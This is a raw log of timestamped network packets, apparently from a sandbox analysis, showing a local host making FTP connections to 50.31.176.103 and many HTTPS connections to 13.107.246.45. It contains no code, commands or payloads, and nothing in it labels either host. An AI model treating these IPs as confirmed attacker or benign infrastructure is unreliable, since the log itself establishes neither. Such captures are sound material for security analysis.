Nov 6, 2024 17:03:09.999305964 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:09.999531031 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:09.999572039 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.001795053 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.002104044 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.008521080 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.127089024 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.130198002 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.134629965 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.139463902 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.139483929 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.148757935 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.157007933 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.157027960 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.177126884 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.177128077 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.179769039 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.179774046 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.181036949 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.181041956 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.181302071 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.181312084 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.181663036 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.181668043 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.182174921 CET	50120	32033	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.187881947 CET	32033	50120	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.189851999 CET	50120	32033	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.189915895 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.489619017 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.509027958 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.509094954 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.509152889 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.509979010 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.509994984 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510005951 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.510013103 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510365963 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.510396957 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510406017 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:10.510422945 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510449886 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510454893 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510493040 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.510493994 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.510493040 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.510529995 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.510893106 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.510906935 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:10.511568069 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.512757063 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.512763023 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.512780905 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.512785912 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.513489008 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.513493061 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.513510942 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.513518095 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.514457941 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.514478922 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.514888048 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.514893055 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.520612955 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.520654917 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.520710945 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.521450043 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.521487951 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.521548033 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.521657944 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.521670103 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.522656918 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.522674084 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.524539948 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.524549961 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.524599075 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.524724960 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.524734020 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.554308891 CET	56862	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.565587997 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.565624952 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.565718889 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.567321062 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.567333937 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.827104092 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.827179909 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.827238083 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.830076933 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.830101967 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.830121994 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.830130100 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.838112116 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.838165998 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:10.838223934 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.838506937 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:10.838522911 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.020520926 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:11.020761967 CET	50120	32033	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:11.020800114 CET	50120	32033	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:11.025608063 CET	32033	50120	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:11.026194096 CET	32033	50120	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:11.026241064 CET	50120	32033	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:11.067743063 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:11.168550014 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:11.208370924 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:11.246814966 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.247303009 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.247359037 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.247785091 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.247791052 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.259552956 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.259917974 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.259944916 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.260361910 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.260373116 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.274483919 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.274962902 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.274982929 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.275408983 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.275413036 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.304856062 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.304922104 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.309032917 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.309042931 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.309303999 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.310000896 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.351336002 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.375545025 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.376194000 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.376245975 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.376250029 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.376296997 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.376349926 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.376374006 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.376389027 CET	50121	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.376394033 CET	443	50121	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.379020929 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.379053116 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.379129887 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.379292011 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.379304886 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.393616915 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.393683910 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.393800020 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.393836975 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.393850088 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.393874884 CET	50122	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.393879890 CET	443	50122	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.395781040 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.395829916 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.396076918 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.396198034 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.396214962 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.411037922 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.411108017 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.411243916 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.411273956 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.411287069 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.411298037 CET	50123	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.411300898 CET	443	50123	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.413160086 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.413181067 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.413255930 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.413364887 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.413374901 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.435323954 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.435508966 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.435560942 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.435615063 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.435625076 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.435636044 CET	50124	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.435640097 CET	443	50124	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.437582016 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.437597036 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:11.437668085 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.437813044 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:11.437822104 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.127748966 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.128210068 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.128231049 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.128716946 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.128724098 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.129676104 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.129951000 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.129981995 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.130466938 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.130472898 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.143754005 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.144099951 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.144125938 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.144504070 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.144509077 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.175502062 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.175854921 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.175879955 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.176279068 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.176289082 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.257976055 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.258012056 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.258076906 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.258141994 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.258311033 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.258327961 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.258338928 CET	50126	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.258346081 CET	443	50126	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.261038065 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.261080027 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.261202097 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.261352062 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.261365891 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.261540890 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.262168884 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.262232065 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.262303114 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.262321949 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.262334108 CET	50127	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.262340069 CET	443	50127	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.264240026 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.264278889 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.264384985 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.264496088 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.264509916 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.273077011 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.273191929 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.273231030 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.273293972 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.273334026 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.273341894 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.273351908 CET	50128	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.273355961 CET	443	50128	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.275387049 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.275427103 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.275523901 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.275659084 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.275672913 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.310417891 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.310748100 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.310803890 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.310852051 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.310852051 CET	50129	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.310868979 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.310878038 CET	443	50129	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.313148022 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.313159943 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.313353062 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.313474894 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.313486099 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.991101027 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.991592884 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.991624117 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:12.992057085 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:12.992063046 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.005022049 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.005506992 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.005532980 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.005927086 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.005932093 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.030385017 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.030877113 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.030908108 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.031310081 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.031320095 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.120335102 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.120374918 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.120426893 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.120440960 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.120484114 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.120723009 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.120743990 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.120760918 CET	50130	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.120765924 CET	443	50130	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.123663902 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.123697042 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.123758078 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.123945951 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.123961926 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.135723114 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.135793924 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.135834932 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.135857105 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.135885000 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.135976076 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.135976076 CET	50132	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.135984898 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.135998011 CET	443	50132	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.138679028 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.138727903 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.138796091 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.138957024 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.138967991 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.161735058 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.161804914 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.161859035 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.161982059 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.161999941 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.162012100 CET	50133	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.162019968 CET	443	50133	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.164433002 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.164469004 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.164545059 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.164673090 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.164688110 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.847204924 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.847995043 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.848047018 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.848510981 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.848517895 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.868872881 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.869416952 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.869436026 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.869816065 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.869821072 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.913547993 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.914051056 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.914079905 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.914444923 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.914450884 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.974879980 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.974931002 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.974986076 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.975055933 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.975116014 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.975405931 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.975423098 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.975434065 CET	50134	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.975439072 CET	443	50134	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.978477001 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.978527069 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:13.978621006 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.978830099 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:13.978844881 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.366453886 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367456913 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367522001 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.367547989 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.367566109 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367579937 CET	50135	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.367585897 CET	443	50135	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367748976 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367806911 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.367863894 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.368577003 CET	50136	443	192.168.2.6	13.107.246.45
